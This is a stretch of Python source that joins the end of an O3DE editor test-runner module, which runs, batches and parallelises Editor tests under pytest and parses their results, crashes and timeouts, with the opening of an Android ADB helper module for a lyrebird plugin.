inner_test_spec.setup(self, request, workspace, editor, editor_test_data, launcher_platform)
# Run
self._run_single_test(request, workspace, editor, editor_test_data, inner_test_spec)
if is_single_test:
# Teardown
inner_test_spec.teardown(self, request, workspace, editor, editor_test_data, launcher_platform)
# Teardown step for wrap_run
next(wrap, None)
return single_run
f = make_test_func(test_spec)
if hasattr(test_spec, "pytestmark"):
f.pytestmark = test_spec.pytestmark
setattr(self.obj, name, f)
# Add the shared tests, with a runner class for storing information from each shared run
runners = []
def create_runner(runner_name, function, tests):
target_runner = EditorTestSuite.Runner(runner_name, function, tests)
def make_func():
@set_marks({"runner": target_runner, "run_type": "run_shared"})
def shared_run(self, request, workspace, editor, editor_test_data, launcher_platform):
getattr(self, function.__name__)(request, workspace, editor, editor_test_data, target_runner.tests)
return shared_run
setattr(self.obj, runner_name, make_func())
# Add the shared tests' results, which succeed/fail based on what happened in the Runner.
for shared_test_spec in tests:
def make_func(inner_test_spec):
@set_marks({"runner": target_runner, "test_spec": inner_test_spec, "run_type": "result"})
def result(self, request, workspace, editor, editor_test_data, launcher_platform):
result_key = inner_test_spec.__name__
# The runner must have filled the editor_test_data.results dict fixture for this test.
# Hitting this exception could mean there was an error executing the runner
if result_key not in editor_test_data.results:
raise Result.EditorTestResultException(f"No results found for {result_key}. "
f"Test may not have ran due to the Editor "
f"shutting down. Check for issues in previous "
f"tests.")
cls._report_result(result_key, editor_test_data.results[result_key])
return result
result_func = make_func(shared_test_spec)
if hasattr(shared_test_spec, "pytestmark"):
result_func.pytestmark = shared_test_spec.pytestmark
setattr(self.obj, shared_test_spec.__name__, result_func)
runners.append(target_runner)
create_runner("run_batched_tests", cls._run_batched_tests, batched_tests)
create_runner("run_parallel_tests", cls._run_parallel_tests, parallel_tests)
create_runner("run_parallel_batched_tests", cls._run_parallel_batched_tests, parallel_batched_tests)
# Now that we have added the functions to the class, have pytest retrieve all the tests the class contains
pytest_class_instance = super().collect()[0]
# Override the istestfunction for the object, with this we make sure that the
# runners are always collected, even if they don't follow the "test_" naming
original_istestfunction = pytest_class_instance.istestfunction
def istestfunction(self, obj, name):
ret = original_istestfunction(obj, name)
if not ret:
ret = hasattr(obj, "marks")
return ret
pytest_class_instance.istestfunction = types.MethodType(istestfunction, pytest_class_instance)
collection = pytest_class_instance.collect()
def get_func_run_type(function):
return getattr(function, "marks", {}).setdefault("run_type", None)
collected_run_pytestfuncs = [
item for item in collection if get_func_run_type(item.obj) == "run_shared"
]
collected_result_pytestfuncs = [
item for item in collection if get_func_run_type(item.obj) == "result"
]
# We'll remove and store the runner functions for later so that they won't
# be deselected by any filtering mechanism. The result functions, however, should be
# filtered, since they determine the final subset of tests to run
collection = [
item for item in collection if item not in collected_run_pytestfuncs
]
# Match each generated pytestfunctions with every runner and store them
for run_pytestfunc in collected_run_pytestfuncs:
runner = run_pytestfunc.function.marks["runner"]
runner.run_pytestfunc = run_pytestfunc
for result_pytestfunc in collected_result_pytestfuncs:
runner = result_pytestfunc.function.marks["runner"]
runner.result_pytestfuncs.append(result_pytestfunc)
self.obj._runners = runners
return collection
@staticmethod
def pytest_custom_makeitem(collector, name, obj):
return EditorTestSuite.EditorTestClass(name, collector)
@classmethod
def pytest_custom_modify_items(cls, session: _pytest.main.Session, items: list[EditorTest],
config: _pytest.config.Config) -> None:
"""
Adds the runners' functions and filters the tests that will run. The runners will be added if they have any
selected tests
:param session: The Pytest Session
:param items: The test case functions
:param config: The Pytest Config object
:return: None
"""
new_items = []
for runner in cls._runners:
runner.tests[:] = cls.filter_session_shared_tests(items, runner.tests)
if len(runner.tests) > 0:
new_items.append(runner.run_pytestfunc)
# Re-order dependent tests so they are run just after the runner
for result_pytestfunc in runner.result_pytestfuncs:
found_test = next((item for item in items if item == result_pytestfunc), None)
if found_test:
items.remove(found_test)
new_items.append(found_test)
items[:] = items + new_items
@classmethod
def get_single_tests(cls) -> list[EditorSingleTest]:
"""
Grabs all of the EditorSingleTest subclasses defined in the EditorTestSuite class
Usage example:
class MyTestSuite(EditorTestSuite):
class MyFirstTest(EditorSingleTest):
from . import script_to_be_run_by_editor as test_module
:return: The list of single tests
"""
single_tests = [c[1] for c in cls.__dict__.items()
if inspect.isclass(c[1]) and issubclass(c[1], EditorSingleTest)]
return single_tests
@classmethod
def get_shared_tests(cls) -> list[EditorSharedTest]:
"""
Grabs all of the EditorSharedTests from the EditorTestSuite
Usage example:
class MyTestSuite(EditorTestSuite):
class MyFirstTest(EditorSharedTest):
from . import script_to_be_run_by_editor as test_module
:return: The list of shared tests
"""
shared_tests = [c[1] for c in cls.__dict__.items()
if inspect.isclass(c[1]) and issubclass(c[1], EditorSharedTest)]
return shared_tests
@classmethod
def get_session_shared_tests(cls, session: _pytest.main.Session) -> list[EditorTest]:
"""
Filters and returns all of the shared tests in a given session.
:session: The test session
:return: The list of tests
"""
shared_tests = cls.get_shared_tests()
return cls.filter_session_shared_tests(session, shared_tests)
@staticmethod
def filter_session_shared_tests(session_items: list[_pytest.python.Function(EditorTest)],
shared_tests: list[EditorSharedTest]) -> list[EditorTest]:
"""
Retrieve the test sub-set that was collected
Note that this can be less than the original set if modified, such as via pytest argument -k
:session_items: The tests in a session to run
:shared_tests: All of the shared tests
:return: The list of filtered tests
"""
def will_run(item):
try:
skip_pytest_runtest_setup(item)
return True
except (Warning, Exception, _pytest.outcomes.OutcomeException) as ex:
# intentionally broad to avoid events other than system interrupts
warnings.warn(f"Test deselected from execution queue due to {ex}")
return False
session_items_by_name = {item.originalname: item for item in session_items}
selected_shared_tests = [test for test in shared_tests if test.__name__ in session_items_by_name.keys() and
will_run(session_items_by_name[test.__name__])]
return selected_shared_tests
@staticmethod
def filter_shared_tests(shared_tests: list[EditorSharedTest], is_batchable: bool = False,
is_parallelizable: bool = False) -> list[EditorSharedTest]:
"""
Filters the provided list of tests on whether they are batchable and/or parallelizable
:shared_tests: List of shared tests
:is_batchable: Filter to batchable tests
:is_parallelizable: Filter to parallelizable tests
:return: The list of filtered tests
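Usage example (a sketch; `shared_tests` is a list of EditorSharedTest subclasses):
    batched_only = EditorTestSuite.filter_shared_tests(shared_tests, is_batchable=True, is_parallelizable=False)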
"""
return [
t for t in shared_tests if (
getattr(t, "is_batchable", None) is is_batchable
and
getattr(t, "is_parallelizable", None) is is_parallelizable
)
]
@staticmethod
def _prepare_asset_processor(workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor_test_data: TestData) -> None:
"""
Prepares the asset processor for the test depending on whether or not the process is open and if the current
test owns it.
:workspace: The workspace object in case an AssetProcessor object needs to be created
:editor_test_data: The test data from calling editor_test_data()
:return: None
"""
try:
# Start-up an asset processor if we are not already managing one
if editor_test_data.asset_processor is None:
if not process_utils.process_exists("AssetProcessor", ignore_extensions=True):
editor_utils.kill_all_ly_processes(include_asset_processor=True)
editor_test_data.asset_processor = AssetProcessor(workspace)
editor_test_data.asset_processor.start()
else: # If another AP process already exists, do not kill it as we do not manage it
editor_utils.kill_all_ly_processes(include_asset_processor=False)
else: # Make sure existing asset processor wasn't closed by accident
editor_test_data.asset_processor.start()
except Exception as ex:
editor_test_data.asset_processor = None
raise ex
def _setup_editor_test(self, editor: ly_test_tools.launchers.platforms.base.Launcher,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor_test_data: TestData) -> None:
"""
Sets up an editor test by preparing the Asset Processor, killing all other O3DE processes, and configuring the editor settings
:editor: The launcher Editor object
:workspace: The test Workspace object
:editor_test_data: The TestData from calling editor_test_data()
:return: None
"""
self._prepare_asset_processor(workspace, editor_test_data)
editor_utils.kill_all_ly_processes(include_asset_processor=False)
editor.configure_settings()
@staticmethod
def _get_results_using_output(test_spec_list: list[EditorTest], output: str, editor_log_content: str) -> dict[str, Result.ResultType]:
"""
Utility function for parsing the output information from the editor. It deserializes the JSON content printed in
the output for every test and returns that information.
:test_spec_list: The list of EditorTests
:output: The editor output from Editor.get_output()
:editor_log_content: The contents of the editor log as a string
:return: A dict of the tests and their respective Result objects
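Each test script is expected to print one line of the following shape to stdout (values are illustrative):
    JSON_START({"name": "my_test_module", "success": true, "output": "..."})JSON_END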
"""
results = {}
pattern = re.compile(r"JSON_START\((.+?)\)JSON_END")
out_matches = pattern.finditer(output)
found_jsons = {}
for m in out_matches:
try:
elem = json.loads(m.groups()[0])
found_jsons[elem["name"]] = elem
except Exception: # Intentionally broad to avoid failing if the output data is corrupt
logging.warning("Error reading result JSON", exc_info=True)
continue
# Try to find the element in the log, this is used for cutting the log contents later
log_matches = pattern.finditer(editor_log_content)
for m in log_matches:
try:
elem = json.loads(m.groups()[0])
if elem["name"] in found_jsons:
found_jsons[elem["name"]]["log_match"] = m
except Exception: # Intentionally broad, to avoid failing if the log data is corrupt
logging.warning("Error reading result JSON", exc_info=True)
continue
log_start = 0
for test_spec in test_spec_list:
name = editor_utils.get_module_filename(test_spec.test_module)
if name not in found_jsons.keys():
results[test_spec.__name__] = Result.Unknown(
test_spec, output,
f"Found no test run information on stdout for {name} in the editor log",
editor_log_content)
else:
result = None
json_result = found_jsons[name]
json_output = json_result["output"]
# Cut the editor log so it only has the output for this run
if "log_match" in json_result:
m = json_result["log_match"]
end = m.end() if test_spec != test_spec_list[-1] else -1
else:
end = -1
cur_log = editor_log_content[log_start: end]
log_start = end
if json_result["success"]:
result = Result.Pass(test_spec, json_output, cur_log)
else:
result = Result.Fail(test_spec, json_output, cur_log)
results[test_spec.__name__] = result
return results
@staticmethod
def _report_result(name: str, result: Result.ResultType) -> None:
"""
Raises a pytest failure if the test result is not a PASS, specifying the information
:name: Name of the test
:result: The Result object which denotes if the test passed or not
:return: None
"""
if isinstance(result, Result.Pass):
output_str = f"Test {name}:\n{str(result)}"
print(output_str)
else:
error_str = f"Test {name}:\n{str(result)}"
pytest.fail(error_str)
def _exec_editor_test(self, request: _pytest.fixtures.FixtureRequest,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor: ly_test_tools.launchers.platforms.base.Launcher,
run_id: int, log_name: str, test_spec: EditorTest,
cmdline_args: list[str] = None) -> dict[str, Result.ResultType]:
"""
Starts the editor with the given test and returns a result dict with a single element specifying the result
:request: The pytest request
:workspace: The LyTestTools Workspace object
:editor: The LyTestTools Editor object
:run_id: The unique run id
:log_name: The name of the editor log to retrieve
:test_spec: The type of EditorTest
:cmdline_args: Any additional command line args
:return: a dictionary of Result objects (should be only one)
"""
if cmdline_args is None:
cmdline_args = []
test_cmdline_args = self.global_extra_cmdline_args + cmdline_args
test_cmdline_args += [
"--regset=/Amazon/Preferences/EnablePrefabSystem=true",
f"--regset-file={os.path.join(workspace.paths.engine_root(), 'Registry', 'prefab.test.setreg')}"]
test_spec_uses_null_renderer = getattr(test_spec, "use_null_renderer", None)
if test_spec_uses_null_renderer or (test_spec_uses_null_renderer is None and self.use_null_renderer):
test_cmdline_args += ["-rhi=null"]
if test_spec.attach_debugger:
test_cmdline_args += ["--attach-debugger"]
if test_spec.wait_for_debugger:
test_cmdline_args += ["--wait-for-debugger"]
# Cycle any old crash report in case it wasn't cycled properly
editor_utils.cycle_crash_report(run_id, workspace)
test_result = None
results = {}
test_filename = editor_utils.get_testcase_module_filepath(test_spec.test_module)
cmdline = [
"--runpythontest", test_filename,
"-logfile", f"@log@/{log_name}",
"-project-log-path", editor_utils.retrieve_log_path(run_id, workspace)] + test_cmdline_args
editor.args.extend(cmdline)
editor.start(backupFiles=False, launch_ap=False, configure_settings=False)
try:
editor.wait(test_spec.timeout)
output = editor.get_output()
return_code = editor.get_returncode()
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
# Save the editor log
workspace.artifact_manager.save_artifact(os.path.join(editor_utils.retrieve_log_path(run_id, workspace), log_name),
f'({run_id}){log_name}')
if return_code == 0:
test_result = Result.Pass(test_spec, output, editor_log_content)
else:
has_crashed = return_code != EditorTestSuite._TEST_FAIL_RETCODE
if has_crashed:
crash_output = editor_utils.retrieve_crash_output(run_id, workspace, self._TIMEOUT_CRASH_LOG)
test_result = Result.Crash(test_spec, output, return_code, crash_output, None)
# Save the .dmp file which is generated on Windows only
dmp_file_name = os.path.join(editor_utils.retrieve_log_path(run_id, workspace),
'error.dmp')
if os.path.exists(dmp_file_name):
workspace.artifact_manager.save_artifact(dmp_file_name)
# Save the crash log
crash_file_name = os.path.join(editor_utils.retrieve_log_path(run_id, workspace),
os.path.basename(workspace.paths.crash_log()))
if os.path.exists(crash_file_name):
workspace.artifact_manager.save_artifact(crash_file_name)
editor_utils.cycle_crash_report(run_id, workspace)
else:
logger.warning(f"Crash occurred, but could not find log {crash_file_name}")
else:
test_result = Result.Fail(test_spec, output, editor_log_content)
except WaitTimeoutError:
output = editor.get_output()
editor.stop()
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
test_result = Result.Timeout(test_spec, output, test_spec.timeout, editor_log_content)
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
results = self._get_results_using_output([test_spec], output, editor_log_content)
results[test_spec.__name__] = test_result
return results
def _exec_editor_multitest(self, request: _pytest.fixtures.FixtureRequest,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor: ly_test_tools.launchers.platforms.base.Launcher, run_id: int, log_name: str,
test_spec_list: list[EditorTest],
cmdline_args: list[str] = None) -> dict[str, Result.ResultType]:
"""
Starts an editor executable with a list of tests and returns a dict of the result of every test ran within that
editor instance. In case of failure this function also parses the editor output to find out what specific tests
failed.
:request: The pytest request
:workspace: The LyTestTools Workspace object
:editor: The LyTestTools Editor object
:run_id: The unique run id
:log_name: The name of the editor log to retrieve
:test_spec_list: A list of EditorTest tests to run in the same editor instance
:cmdline_args: Any additional command line args
:return: A dict of Result objects
"""
if cmdline_args is None:
cmdline_args = []
test_cmdline_args = self.global_extra_cmdline_args + cmdline_args
test_cmdline_args += [
"--regset=/Amazon/Preferences/EnablePrefabSystem=true",
f"--regset-file={os.path.join(workspace.paths.engine_root(), 'Registry', 'prefab.test.setreg')}"]
if self.use_null_renderer:
test_cmdline_args += ["-rhi=null"]
if any([t.attach_debugger for t in test_spec_list]):
test_cmdline_args += ["--attach-debugger"]
if any([t.wait_for_debugger for t in test_spec_list]):
test_cmdline_args += ["--wait-for-debugger"]
# Cycle any old crash report in case it wasn't cycled properly
editor_utils.cycle_crash_report(run_id, workspace)
results = {}
# We create a file containing a semicolon separated list for the Editor to read
temp_batched_file = tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='.txt')
for test_spec in test_spec_list[:-1]:
temp_batched_file.write(editor_utils.get_testcase_module_filepath(test_spec.test_module)
.replace('\\', '\\\\')+';')
# The last entry does not have a semicolon
temp_batched_file.write(editor_utils.get_testcase_module_filepath(test_spec_list[-1].test_module)
.replace('\\', '\\\\'))
temp_batched_file.flush()
temp_batched_file.close()
cmdline = [
"--runpythontest", temp_batched_file.name,
"-logfile", f"@log@/{log_name}",
"-project-log-path", editor_utils.retrieve_log_path(run_id, workspace)] + test_cmdline_args
editor.args.extend(cmdline)
editor.start(backupFiles=False, launch_ap=False, configure_settings=False)
output = ""
editor_log_content = ""
try:
editor.wait(self.timeout_editor_shared_test)
output = editor.get_output()
return_code = editor.get_returncode()
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
# Save the editor log
try:
workspace.artifact_manager.save_artifact(
os.path.join(editor_utils.retrieve_log_path(run_id, workspace), log_name), f'({run_id}){log_name}')
except FileNotFoundError:
# Error logging is already performed and we don't want this to fail the test
pass
if return_code == 0:
# No need to scrape the output, as all the tests have passed
for test_spec in test_spec_list:
results[test_spec.__name__] = Result.Pass(test_spec, output, editor_log_content)
else:
# Scrape the output to attempt to find out which tests failed.
# This function should always populate the result dict; if it found no data for a test, that test's result will be of the "Unknown" type
results = self._get_results_using_output(test_spec_list, output, editor_log_content)
assert len(results) == len(test_spec_list), "bug in _get_results_using_output(), the number of results don't match the tests ran"
# If the editor crashed, find out in which test it happened and update the results
has_crashed = return_code != EditorTestSuite._TEST_FAIL_RETCODE
if has_crashed:
crashed_result = None
for test_spec_name, result in results.items():
if isinstance(result, Result.Unknown):
if not crashed_result:
# The first test with "Unknown" result (no data in output) is likely the one that crashed
crash_error = editor_utils.retrieve_crash_output(run_id, workspace,
self._TIMEOUT_CRASH_LOG)
# Save the .dmp file which is generated on Windows only
dmp_file_name = os.path.join(editor_utils.retrieve_log_path(run_id, workspace),
'error.dmp')
if os.path.exists(dmp_file_name):
workspace.artifact_manager.save_artifact(dmp_file_name)
# Save the crash log
crash_file_name = os.path.join(editor_utils.retrieve_log_path(run_id, workspace),
os.path.basename(workspace.paths.crash_log()))
if os.path.exists(crash_file_name):
workspace.artifact_manager.save_artifact(crash_file_name)
editor_utils.cycle_crash_report(run_id, workspace)
else:
logger.warning(f"Crash occurred, but could not find log {crash_file_name}")
results[test_spec_name] = Result.Crash(result.test_spec, output, return_code,
crash_error, result.editor_log)
crashed_result = result
else:
# If there are remaining "Unknown" results, these couldn't execute because of the crash,
# update with info about the offender
results[test_spec_name].extra_info = f"This test has unknown result, " \
f"test '{crashed_result.test_spec.__name__}' " \
f"crashed before this test could be executed"
# if all the tests ran, the one that has caused the crash is the last test
if not crashed_result:
crash_error = editor_utils.retrieve_crash_output(run_id, workspace, self._TIMEOUT_CRASH_LOG)
editor_utils.cycle_crash_report(run_id, workspace)
                        results[test_spec_name] = Result.Crash(result.test_spec, output, return_code,
                                                               crash_error, result.editor_log)
except WaitTimeoutError:
editor.stop()
output = editor.get_output()
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
# The editor timed out when running the tests, get the data from the output to find out which ones ran
results = self._get_results_using_output(test_spec_list, output, editor_log_content)
            assert len(results) == len(test_spec_list), "bug in _get_results_using_output(), the number of results doesn't match the number of tests that ran"
# Similar logic here as crashes, the first test that has no result is the one that timed out
timed_out_result = None
for test_spec_name, result in results.items():
if isinstance(result, Result.Unknown):
if not timed_out_result:
results[test_spec_name] = Result.Timeout(result.test_spec, result.output,
self.timeout_editor_shared_test,
result.editor_log)
timed_out_result = result
else:
                        # If there are remaining "Unknown" results, these couldn't execute because of the timeout,
# update with info about the offender
results[test_spec_name].extra_info = f"This test has unknown result, test " \
f"'{timed_out_result.test_spec.__name__}' timed out " \
f"before this test could be executed"
# if all the tests ran, the one that has caused the timeout is the last test, as it didn't close the editor
if not timed_out_result:
                results[test_spec_name] = Result.Timeout(result.test_spec,
results[test_spec_name].output,
self.timeout_editor_shared_test, result.editor_log)
finally:
if temp_batched_file:
os.unlink(temp_batched_file.name)
return results
def _run_single_test(self, request: _pytest.fixtures.FixtureRequest,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor: ly_test_tools.launchers.platforms.base.Launcher,
editor_test_data: TestData, test_spec: EditorSingleTest) -> None:
"""
Runs a single test (one editor, one test) with the given specs
:request: The Pytest Request
:workspace: The LyTestTools Workspace object
:editor: The LyTestTools Editor object
:editor_test_data: The TestData from calling editor_test_data()
:test_spec: The test class that should be a subclass of EditorSingleTest
:return: None
"""
self._setup_editor_test(editor, workspace, editor_test_data)
extra_cmdline_args = []
if hasattr(test_spec, "extra_cmdline_args"):
extra_cmdline_args = test_spec.extra_cmdline_args
result = self._exec_editor_test(request, workspace, editor, 1, "editor_test.log", test_spec, extra_cmdline_args)
if result is None:
logger.error(f"Unexpectedly found no test run in the editor log during {test_spec}")
result = {"Unknown":
Result.Unknown(
test_spec=test_spec,
extra_info="Unexpectedly found no test run information on stdout in the editor log")}
editor_test_data.results.update(result)
test_name, test_result = next(iter(result.items()))
self._report_result(test_name, test_result)
# If test did not pass, save assets with errors and warnings
if not isinstance(test_result, Result.Pass):
editor_utils.save_failed_asset_joblogs(workspace)
def _run_batched_tests(self, request: _pytest.fixtures.FixtureRequest,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor: ly_test_tools.launchers.platforms.base.Launcher, editor_test_data: TestData,
test_spec_list: list[EditorSharedTest], extra_cmdline_args: list[str] = None) -> None:
"""
Runs a batch of tests in one single editor with the given spec list (one editor, multiple tests)
:request: The Pytest Request
:workspace: The LyTestTools Workspace object
:editor: The LyTestTools Editor object
:editor_test_data: The TestData from calling editor_test_data()
:test_spec_list: A list of EditorSharedTest tests to run
:extra_cmdline_args: Any extra command line args in a list
:return: None
"""
if extra_cmdline_args is None:
extra_cmdline_args = []
if not test_spec_list:
return
self._setup_editor_test(editor, workspace, editor_test_data)
results = self._exec_editor_multitest(request, workspace, editor, 1, "editor_test.log", test_spec_list,
extra_cmdline_args)
editor_test_data.results.update(results)
# If at least one test did not pass, save assets with errors and warnings
        for result in results.values():
if result is None:
logger.error("Unexpectedly found no test run in the editor log during EditorBatchedTest")
logger.debug(f"Results from EditorBatchedTest:\n{results}")
if not isinstance(result, Result.Pass):
editor_utils.save_failed_asset_joblogs(workspace)
return # exit early on first batch failure
def _run_parallel_tests(self, request: _pytest.fixtures.FixtureRequest,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor: ly_test_tools.launchers.platforms.base.Launcher, editor_test_data: TestData,
test_spec_list: list[EditorSharedTest], extra_cmdline_args: list[str] = None) -> None:
"""
Runs multiple editors with one test on each editor (multiple editor, one test each)
:request: The Pytest Request
:workspace: The LyTestTools Workspace object
:editor: The LyTestTools Editor object
:editor_test_data: The TestData from calling editor_test_data()
:test_spec_list: A list of EditorSharedTest tests to run
:extra_cmdline_args: Any extra command line args in a list
:return: None
"""
if extra_cmdline_args is None:
extra_cmdline_args = []
if not test_spec_list:
return
self._setup_editor_test(editor, workspace, editor_test_data)
parallel_editors = self._get_number_parallel_editors(request)
assert parallel_editors > 0, "Must have at least one editor"
# If there are more tests than max parallel editors, we will split them into multiple consecutive runs
num_iterations = int(math.ceil(len(test_spec_list) / parallel_editors))
for iteration in range(num_iterations):
tests_for_iteration = test_spec_list[iteration*parallel_editors:(iteration+1)*parallel_editors]
total_threads = len(tests_for_iteration)
threads = []
results_per_thread = [None] * total_threads
for i in range(total_threads):
def make_func(test_spec, index, my_editor):
def run(request, workspace, extra_cmdline_args):
results = self._exec_editor_test(request, workspace, my_editor, index+1, f"editor_test.log",
test_spec, extra_cmdline_args)
assert results is not None
results_per_thread[index] = results
return run
# Duplicate the editor using the one coming from the fixture
cur_editor = editor.__class__(workspace, editor.args.copy())
f = make_func(tests_for_iteration[i], i, cur_editor)
t = threading.Thread(target=f, args=(request, workspace, extra_cmdline_args))
t.start()
threads.append(t)
for t in threads:
t.join()
save_asset_logs = False
for result in results_per_thread:
if result is None:
logger.error("Unexpectedly found no test run in the editor log during EditorParallelTest")
logger.debug(f"Results from EditorParallelTest thread:\n{results_per_thread}")
result = {"Unknown":
Result.Unknown(
test_spec=EditorParallelTest,
extra_info="Unexpectedly found no test run information on stdout in the editor log")}
editor_test_data.results.update(result)
                if any(not isinstance(res, Result.Pass) for res in result.values()):
                    save_asset_logs = True
# If at least one test did not pass, save assets with errors and warnings
if save_asset_logs:
editor_utils.save_failed_asset_joblogs(workspace)
def _run_parallel_batched_tests(self, request: _pytest.fixtures.FixtureRequest,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor: ly_test_tools.launchers.platforms.base.Launcher, editor_test_data: TestData,
test_spec_list: list[EditorSharedTest], extra_cmdline_args: list[str] = None) -> None:
"""
Runs multiple editors with a batch of tests for each editor (multiple editor, multiple tests each)
:request: The Pytest Request
:workspace: The LyTestTools Workspace object
:editor: The LyTestTools Editor object
:editor_test_data: The TestData from calling editor_test_data()
:test_spec_list: A list of EditorSharedTest tests to run
:extra_cmdline_args: Any extra command line args in a list
:return: None
"""
if extra_cmdline_args is None:
extra_cmdline_args = []
if not test_spec_list:
return
self._setup_editor_test(editor, workspace, editor_test_data)
total_threads = self._get_number_parallel_editors(request)
assert total_threads > 0, "Must have at least one editor"
threads = []
tests_per_editor = int(math.ceil(len(test_spec_list) / total_threads))
results_per_thread = [None] * total_threads
for i in range(total_threads):
tests_for_thread = test_spec_list[i*tests_per_editor:(i+1)*tests_per_editor]
def make_func(test_spec_list_for_editor, index, my_editor):
def run(request, workspace, extra_cmdline_args):
results = None
if len(test_spec_list_for_editor) > 0:
results = self._exec_editor_multitest(request, workspace, my_editor, index+1,
f"editor_test.log", test_spec_list_for_editor,
extra_cmdline_args)
assert results is not None
else:
results = {}
results_per_thread[index] = results
return run
# Duplicate the editor using the one coming from the fixture
cur_editor = editor.__class__(workspace, editor.args.copy())
f = make_func(tests_for_thread, i, cur_editor)
t = threading.Thread(target=f, args=(request, workspace, extra_cmdline_args))
t.start()
threads.append(t)
for t in threads:
t.join()
save_asset_logs = False
for result in results_per_thread:
if result is None:
logger.error("Unexpectedly found no test run in the editor log during EditorSharedTest")
logger.debug(f"Results from EditorSharedTest thread:\n{results_per_thread}")
result = {"Unknown":
Result.Unknown(
test_spec=EditorSharedTest,
extra_info="Unexpectedly found no test run information on stdout in the editor log")}
editor_test_data.results.update(result)
            if any(not isinstance(res, Result.Pass) for res in result.values()):
                save_asset_logs = True
# If at least one test did not pass, save assets with errors and warnings
if save_asset_logs:
editor_utils.save_failed_asset_joblogs(workspace)
def _get_number_parallel_editors(self, request: _pytest.fixtures.FixtureRequest) -> int:
"""
        Retrieves the number of parallel editors to use, based on cmdline overrides, class overrides, or the default
:request: The Pytest Request object
:return: The number of parallel editors to use
"""
parallel_editors_value = request.config.getoption("--editors-parallel", None)
if parallel_editors_value:
return int(parallel_editors_value)
return self.get_number_parallel_editors()
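# Illustrative sketch (an assumption, not code from this module): a concrete suite built on the
# runners above would subclass EditorTestSuite and declare one inner class per test. The batching
# code above reads `test_module` (and optionally `extra_cmdline_args`) from each test class and
# passes the module's file path to the Editor via --runpythontest. The module names below are
# hypothetical.
#
# class TestAutomation(EditorTestSuite):
#
#     class MySingleTest(EditorSingleTest):
#         from . import my_single_test as test_module
#
#     class MySharedTest(EditorSharedTest):
#         from . import my_shared_test as test_module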
|
android_helper.py
|
import os
import sys
import json
import time
import codecs
import lyrebird
import threading
import subprocess
from . import config
from lyrebird import context
from lyrebird.log import get_logger
"""
Android Debug Bridge command helper
Basic ADB command for device_service and API
"""
logger = get_logger()
here = os.path.dirname(__file__)
adb = None
static = os.path.abspath(os.path.join(here, 'static'))
storage = lyrebird.get_plugin_storage()
tmp_dir = os.path.abspath(os.path.join(storage, 'tmp'))
anr_dir = os.path.abspath(os.path.join(storage, 'anr'))
crash_dir = os.path.abspath(os.path.join(storage, 'crash'))
screenshot_dir = os.path.abspath(os.path.join(storage, 'screenshot'))
if not os.path.exists(tmp_dir):
os.makedirs(tmp_dir)
if not os.path.exists(anr_dir):
os.makedirs(anr_dir)
if not os.path.exists(crash_dir):
os.makedirs(crash_dir)
class ADBError(Exception):
pass
class AndroidHomeError(Exception):
pass
def check_android_home():
global adb
android_home = os.environ.get('ANDROID_HOME')
    if not android_home:
        raise AndroidHomeError('Environment variable ANDROID_HOME is not set')
    if not os.path.exists(android_home):
        raise AndroidHomeError('ANDROID_HOME %s does not exist' % android_home)
    if not os.path.isdir(android_home):
        raise AndroidHomeError('ANDROID_HOME %s is not a directory' % android_home)
if sys.platform == 'win32':
adb = os.path.abspath(os.path.join(android_home, 'platform-tools/adb.exe'))
elif sys.platform == 'darwin' or sys.platform == 'linux':
adb = os.path.abspath(os.path.join(android_home, 'platform-tools/adb'))
else:
raise ADBError('Unsupported platform')
class App:
def __init__(self, package):
self.package = package
self.launch_activity = None
self.version_name = None
self.version_code = None
self.raw = None
@classmethod
def from_raw(cls, package, raw_data):
app = cls(package)
app.raw = raw_data
lines = raw_data.split('\n')
actionMAIN_line_num = None
for index, line in enumerate(lines):
if 'versionCode' in line:
app.version_code = line.strip().split(' ')[0]
if 'versionName' in line:
app.version_name = line.strip().split('=')[1]
if 'android.intent.action.MAIN:' in line:
actionMAIN_line_num = index + 1
if app.version_name and app.version_code and actionMAIN_line_num:
package_name_line = lines[actionMAIN_line_num]
app.launch_activity = package_name_line.strip().split()[1]
break
return app
class Device:
def __init__(self, device_id):
self.device_id = device_id
self.state = None
self.product = None
self.model = None
self._log_process = None
self._log_cache = []
self._log_crash_cache = []
self._log_file = None
self._log_filtered_file = None
self._crash_filtered_file = None
self._anr_filtered_file = None
self._screen_shot_file = None
self._anr_file = None
self._crash_file_list = []
self._device_info = None
self._app_info = None
self.start_catch_log = False
@property
def log_file(self):
return self._log_file
@property
def log_filtered_file(self):
return self._log_filtered_file
@property
def crash_filtered_file(self):
return self._crash_filtered_file
@property
def anr_filtered_file(self):
return self._anr_filtered_file
@property
def screen_shot_file(self):
return self._screen_shot_file
@property
def anr_file(self):
return self._anr_file
@property
def crash_file_list(self):
return self._crash_file_list
@classmethod
def from_adb_line(cls, line):
device_info = [info for info in line.split(' ') if info]
if len(device_info) < 2:
raise ADBError(f'Read device info line error. {line}')
_device = cls(device_info[0])
_device.state = device_info[1]
for info in device_info[2:]:
info_kv = info.split(':')
if len(info_kv) >= 2:
setattr(_device, info_kv[0], info_kv[1])
else:
logger.error(f'Read device info error: unknown format {info_kv}')
return _device
def install(self, apk_file):
subprocess.run(f'{adb} -s {self.device_id} install -r {apk_file}', shell=True)
def push(self, src, dst):
        subprocess.run(f'{adb} -s {self.device_id} push {src} {dst}', shell=True)
def pull(self, src, dst):
        subprocess.run(f'{adb} -s {self.device_id} pull {src} {dst}', shell=True)
def start_log(self):
self.stop_log()
log_file_name = 'android_log_%s.log' % self.device_id
self._log_file = os.path.abspath(os.path.join(tmp_dir, log_file_name))
p = subprocess.Popen(f'{adb} -s {self.device_id} logcat', shell=True, stdout=subprocess.PIPE)
conf = config.load()
package_name = conf.package_name
pid_target = []
